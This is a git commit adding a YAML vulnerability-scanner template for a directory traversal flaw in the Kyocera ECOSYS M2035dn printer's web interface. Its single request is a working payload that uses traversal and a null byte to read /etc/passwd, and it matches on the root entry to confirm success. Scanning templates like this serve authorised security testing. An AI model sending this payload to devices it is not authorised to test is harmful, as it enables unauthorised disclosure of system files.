Create kyocera-rx-ecosys-m2035dn-lfi.yaml

patch-1
Roberto Nunes 2022-02-14 17:58:07 +09:00 committed by GitHub
parent 3b86b8839e
commit 36c90b1358
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: kyocera-rx-ecosys-m2035dn-lfi
info:
name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
author: 0x_Akoko
severity: high
description: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
reference:
- https://www.exploit-db.com/exploits/50738
- https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
tags: printer,iot,kyocera,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200